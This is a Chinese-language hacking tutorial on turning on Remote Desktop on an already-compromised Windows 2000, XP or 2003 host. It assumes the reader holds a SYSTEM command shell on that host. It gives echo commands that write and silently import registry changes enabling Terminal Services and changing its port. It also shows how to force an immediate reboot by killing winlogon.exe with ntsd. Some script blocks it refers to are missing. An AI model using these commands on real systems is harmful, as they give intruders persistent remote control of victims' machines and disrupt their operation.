開啟終端的最簡單方法全攻略
作者：haicao [E.S.T]
信息來源：邪惡八進制

今天介紹的這種開終端的方法，綠色，環保，無污染~~
不須上傳任何檔開啟終端的方法適合win2k,xp,2003.
本文前提是已經通過某種方法得到了對方的一個SYSTEM權限的CMDSHELL~~
在無須傳任何文件的情況下開啟終端服務。
一、win 2k下終端開啟終端
首先用ECHO寫一個3389.reg文件,然後導入到註冊表，echo代碼如下：

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg

把這些ECHO代碼到CMDSHELL下貼粘就可以生成3389.reg文件，接著regedit /s 3389.reg導入註冊表。
(如果要改變終端端口只須把上面的兩個D3D都改一下就可以了)
因為win 2k下開終端不能像XP一樣可以立即生效,而是需重啟機器後才生效。
一個簡單的辦法就是用ntsd.exe(win2k以上自帶的命令)結束一個重要的進程就可以實現機器重啟了！！
比如結束winlogon.exe,lsass.exe也可以但結束後會跳出重啟倒計時(不太好~)
winlogon.exe被關閉後機器立刻強制重啟了
命令執行格式為ntsd -c q -p PID
那如何知道winlogon.exe的PID進程號呢~
以下這個腳本可以列舉當前所有進程的PID：

在CMDSHELL窗口下貼上如下ECHO代碼就可以得到查看進程PID的腳本1.vbe：

生成1.vbe後請檢查一下echo出來的腳本是否有錯(才四行，對一下上面給出的就可以了)。
運行1.vbe得到如下運行結果：

C:\WINNT\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.

PID   ProcessName
0     System Idle Process
8     System
152   smss.exe
180   csrss.exe
200   winlogon.exe
228   services.exe
240   lsass.exe
424   svchost.exe
472   spoolsv.exe
512   msdtc.exe
616   svchost.exe
628   KAVSvc.EXE
660   llssrv.exe
692   nvsvc32.exe
728   regsvc.exe
748   MSTask.exe
776   alter.exe
900   svchost.exe
916   WinMgmt.exe
1088   Dfssvc.exe
484   Explorer.EXE
1444   mdm.exe
1340   Server.exe
1224   ibguard.exe
1252   KAVSvcUI.EXE
1256   ibserver.exe
1336   internat.exe
1204   Uspds.exe
720   bar.exe
1288   dllhost.exe
1580   inetinfo.exe
1672   cmd.exe
1464   pppoe.exe
1704   regedit.exe
316   cscript.exe

從上面可以看出當前winlogon.exe的PID號為200運行命令ntsd -c q -p 200 (這裡的200要替換為winlogon.exe進程對就的PID啦)過會兒機器馬

上重啟了(ntsd.exe是WIN自帶的可用來結束任意級別進程)等著收穫吧~~

二、winxp和win2003終端開啟

開啟的REG文件代碼如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
用以下ECHO代碼寫一個REG文件：

這樣xp和2003開啟終端是不用重啟的如果你想改端口只需把上面的兩個PortNumber對應的D3D改成相應十進制數的十六進制形式就可以了！用計算器轉換吧。
XP下不論開終端還是改終端端口都不需重啟，真是太妙了~~呵呵。
如果要關閉終閉只需把"fDenyTSConnections"=dword:00000000
改成"fDenyTSConnections"=dword:00000001

 給當前日誌評分：

正在讀取評分資料...